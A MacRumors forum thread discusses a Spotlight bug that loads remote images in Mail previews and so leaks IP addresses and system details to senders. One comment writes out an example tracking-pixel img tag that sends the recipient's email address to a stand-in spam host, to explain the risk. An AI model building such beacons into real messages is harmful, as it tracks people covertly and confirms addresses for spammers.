I was optimistic after watching the Spotlight demo during the Apple keynote, but Alfred is just so fast and supports doing some pretty fancy stuff. Oh Alfred how I've missed you!
Got a tip for us?
Let us know
Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.
OS X Spotlight Glitch Exposes IP Addresses and Other System Details to Spammers
- Thread starter MacRumors
- Start date
- Sort by reaction score
I was optimistic after watching the Spotlight demo during the Apple keynote, but Alfred is just so fast and supports doing some pretty fancy stuff. Oh Alfred how I've missed you!
I'm not familiar with those presets you mention. I've been running it since version 1 so perhaps it's kept all of my original settings. You don't really have to 'wonder' what's getting out - just monitor your network. I'm going to go out on a limb and suggest that YOU should primarily be concerned with your privacy, as easy as it is to vilify apple or any other company for that matter.
I miss Steve
He might have gotten bad press for his dedication to perfection, but in fact, this is what made OS X great, and eventually the dragon slayer of Microsoft in the foible department.
Now we've got a mountain of snafus to point to, makes you go hmmmm......
Please, programmers, stop rushing to get crap out the door.
You have opened beta testing to the masses, use the data retrieved wisely.
He might have gotten bad press for his dedication to perfection, but in fact, this is what made OS X great, and eventually the dragon slayer of Microsoft in the foible department.
Now we've got a mountain of snafus to point to, makes you go hmmmm......
Please, programmers, stop rushing to get crap out the door.
You have opened beta testing to the masses, use the data retrieved wisely.
I wish they did. Apple doesn't have nearly enough programmers, it seems or they wouldn't have such buggy software all the time. Now they're trying to have one year cycles for OS X and iOS both. It's not working out too well for them, IMO. I hear stories of constantly shuffling people around that know what they're doing so they can fix this and that, but that leaves other people finishing the work they started, etc. I believe Scott Forestall quit due to this sort of treatment (the "Maps" thing being a direct result of people quitting and people being shuffled) and that IS a shame since Ive doesn't know WTF he's doing when it comes to software, IMO.
What's a spammer going to do with your IP address and OS details? Every web site you visit gets this information. How is this even a concern or story? If you are so paranoid that you don't even want people to know your general location or what OS you are running, you shouldn't be connected to the outside world at all.
Or just have spotlight check your html e-mail load settings prior to searching through your e-mails and loading the spam images (confirming you are a valid e-mail address to the bad guys).
The Spotlight folks just missed this in their requirements - probably won't be too terrible to fix it...course that's the thing, Apple needs to fix this not ignore it, since its a privacy related thing I would guess they will.
Right On
IP Address? What IP address the one of my router, really. Why is this even a story. OS details whatever. So a guy at this IP has this OS version. Let's target him, blah blah blah. What a dumb story, more FUD. Now if the a$$holes said that they could run something triggered by the SpotLight indexing it would be a story. Move on, nothing to see here.
IP Address? What IP address the one of my router, really. Why is this even a story. OS details whatever. So a guy at this IP has this OS version. Let's target him, blah blah blah. What a dumb story, more FUD. Now if the a$$holes said that they could run something triggered by the SpotLight indexing it would be a story. Move on, nothing to see here.
aren't tracking pixels relevant only in spam emails? and you have to open the email for them to work right?
I'm sure a lot of websites you visit have some content being loaded by something that gives info to a spammer. Enable the Safari status bar, disable AdBlock, and see how many random domains you connect to just to load a simple blog somewhere.
Does this only affect Yosemite? The article didn't say anything. Spotlight searches Mail messages in some earlier versions of OS X too, I think even Tiger.
----------
I remember enabling remote images because I kept getting non-spam emails that contained them. I got zero spam until my mom gave my email address out to some stupid websites, and I still hardly get any.
And I'm sure that the NSA knew about this one months ago...
----------
Not having wadded through the earlier posts, this 'bug' seems to involve Spotlight, more than Mail, correct?
Mail has been flaky for me. Anything involving filtering, and it seems to have a mind of its own.
----------
Not having wadded through the earlier posts, this 'bug' seems to involve Spotlight, more than Mail, correct?
Mail has been flaky for me. Anything involving filtering, and it seems to have a mind of its own.
Good to know, and worth fixing.
But as a heavy Spotlight user and mail-searcher for years, I don't think I have EVER quick-looked a spam message.
You might by accident, but it's definitely what I'd call an edge case. Spam messages aren't likely to look (by title) like the thing you were searching for, so you won't need to quicklook them.
I'll try to contain my panic.
It is, for most people, but experiences vary and people have a million different complex email needs. Apple Mail has been excellent for me! The filters especially have been a lifesaver. Color codes and special sounds and auto-filing galore!
I do know it had bad spell around a year ago for GMail users: Google doesn't follow normal email standards (which isn't a criticism: GMail is meant to be different) and Apple's attempt to improve how that was handled did not go smoothly. But it was addressed, and GMail seems fine now through Apple Mail: most of the mail I get is through Google in fact.
But as a heavy Spotlight user and mail-searcher for years, I don't think I have EVER quick-looked a spam message.
You might by accident, but it's definitely what I'd call an edge case. Spam messages aren't likely to look (by title) like the thing you were searching for, so you won't need to quicklook them.
I'll try to contain my panic.
It is, for most people, but experiences vary and people have a million different complex email needs. Apple Mail has been excellent for me! The filters especially have been a lifesaver. Color codes and special sounds and auto-filing galore!
I do know it had bad spell around a year ago for GMail users: Google doesn't follow normal email standards (which isn't a criticism: GMail is meant to be different) and Apple's attempt to improve how that was handled did not go smoothly. But it was addressed, and GMail seems fine now through Apple Mail: most of the mail I get is through Google in fact.
From this report, it seems that the glitch is with Spotlight, not with Mail.app, at least not directly. Mail might be providing a Spotlight plugin, and that plugin may need to be fixed, but the app itself doesn't suffer from this vulnerability, or am I misreading something?
Mail.app has been the best mail client that I've used in the past 10 years. I'm not saying it's always been perfect, but compared to the painful experience of supporting clients using the myriad of Outlook/Express versions, my Mail experience has been fantastic and virtually flawless.
I frequently have 6 to 12 IMAP-based accounts setup in my Mail.app at one time, and except for a few connection problems here and there, solved with some patience and reboot of the app, it's been a pleasure to use.
----------
It's about data collection and correlation. Your public IP address (WAN address, not internal LAN address) quite often reveals the your geographic area in the world, so they can use that data to build analysis reports of which geographic areas in the world are most effective to be targeted. This also ties back to web advertising campaigns, which can be geographically targeted. So you may receive a spam message, they get your IP address, determine your location, and then you start seeing web ads as a result. It's all about the data.
That's not true; as others have pointed out, many spammers prefer to use lists of "confirmed" e-mail addresses, which sell for much higher prices.
Not at all. You can do it quite trivially with only one spam pixel image, like this:
<img src="http://myevilspamsite.com/spam_pixel.jpg?address=johndoe@whatever.com" />
Then, using the same software that they use to put "Hello johndoe," at the top of the emails they send you, they can simply swap the appropriate address into the img tag. Voilà; one image, verifying millions of addresses.
Bottom line: loading images should be turned off for security reasons, and it's pretty bad if Spotlight is ignoring that setting.
Little Snitch is the best shareware program an OS X user could have for security concerns!
If I understood the article correctly it comes across as needlessly confusing.
So in short, Apple Mail has an option that prevents remote loading of images in email (unless you specifically request them). This is a handy thing to do as spammers can track whether you've received an email by embedding and effectively invisible image in the email they send you. When you open the email the image is requested from the remote server providing confirmation and your IP address (which can be referenced against other sales databases for targeted marketing).
You should enable that feature in your email client.
Whether you have or have not done this in Apple Mail, though—what does that have to do with the Spotlight bug? What is said here is that when you open the email in spotlight (all you have to do is *click* on the email name, but if you don't do that it shouldn't open the email) it will not honor that setting from Apple Mail (as it should). The data would still be returned if you haven't set this feature up in Apple Mail.
So for now, if this is something you have taken steps to protect against, don't click on those emails or disable indexing of email from Spotlight until Apple (hopefully) fixes the issue. In either case, it's a bummer of a move for people who know enough to have kept an email address relatively or completely spam free and use Spotlight to browse email addresses, but contrary to what a few have suggested, I can think of much bigger security issues or bugs that have cropped up in recent history.
And depends on how paranoid someone wants to be (or has actual reason to be).
So in short, Apple Mail has an option that prevents remote loading of images in email (unless you specifically request them). This is a handy thing to do as spammers can track whether you've received an email by embedding and effectively invisible image in the email they send you. When you open the email the image is requested from the remote server providing confirmation and your IP address (which can be referenced against other sales databases for targeted marketing).
You should enable that feature in your email client.
Whether you have or have not done this in Apple Mail, though—what does that have to do with the Spotlight bug? What is said here is that when you open the email in spotlight (all you have to do is *click* on the email name, but if you don't do that it shouldn't open the email) it will not honor that setting from Apple Mail (as it should). The data would still be returned if you haven't set this feature up in Apple Mail.
So for now, if this is something you have taken steps to protect against, don't click on those emails or disable indexing of email from Spotlight until Apple (hopefully) fixes the issue. In either case, it's a bummer of a move for people who know enough to have kept an email address relatively or completely spam free and use Spotlight to browse email addresses, but contrary to what a few have suggested, I can think of much bigger security issues or bugs that have cropped up in recent history.
Not really?
And depends on how paranoid someone wants to be (or has actual reason to be).
Using Mavericks, I can answer a "yes" to this. It's easy to tell - if you have remote image display off in Mail.app, then you know how a, for example, Target.com or Apple.com e.mail looks with images off. When you search in Spotlight on the Mac, for something like the subject of an e.mail from Target/Apple, it will list the subject, and if you hover your mouse over it, to the left of it, a preview of the e.mail is generated. In this preview, the remote images are displayed.
Something to note - *usually* remote images are used by legit marketers - e.g.: you signed up with Target, perhaps, after you ordered something from them, so you opted into their weekly e.mails. They want to know who's picking up those e.mails and what they are clicking on and what mail clients are being used [which can be useful - that way they make sure to test their HTML e.mails with mail clients that people are using]. If you didn't want this weekly e.mail, you click an 'unsubscribe' link, and it is honored.
A typical spammer gets your address via means that are not by permission and there is no legit unsubscribe link. In fact, sometimes if one is included, it is a baited website that simply confirms you have a valid address and then that address is added to a list of known good addresses and sold to spammers.
What Apple should do is what many other MUAs have done [Mail User Agents]. Make it so if you whitelist an address [eg: adding the Target address to your address book], the remote images will display. But if you get an e.mail from an unknown address, it won't display. Or at least give users that option. I don't mind allowing some legit organizations know that I opened their e.mail and am using a Mac and all that; but I certainly don't want to inform a Russian bride website that the address they sent a message to is valid; they may not take me off of their list, but at least my address won't be added to more lists!
/vjl/
I had endless problems getting Mail to check the mail immediately after pressing the get mail button. This started back when they even acknowledged a problem with getting mail. Their fix improved things (it would eventually auto-check the mail after it instead of sitting there for days not checking it unless I exited and restarted). But it would still not reliably check the mail immediately after pressing that button so I switched to Thunderbird that would. The other problem is that Apple won't update their apps anymore unless you upgrade the entire OS. You used to at least get updates for a few versions after a new OS X version would come out. Now they use updates as leverage to try and push you into upgrading to Yosemite (and whatever comes after, etc.) That is simply unacceptable, IMO. The same is true of Safari.
Well no cause some of us like to remote load images. We want to see those. Just not the ones we filtered/rules into junk or deleted. So spotlight would also need to read the rules we set as well to see if we have set a rule to delete certain emails.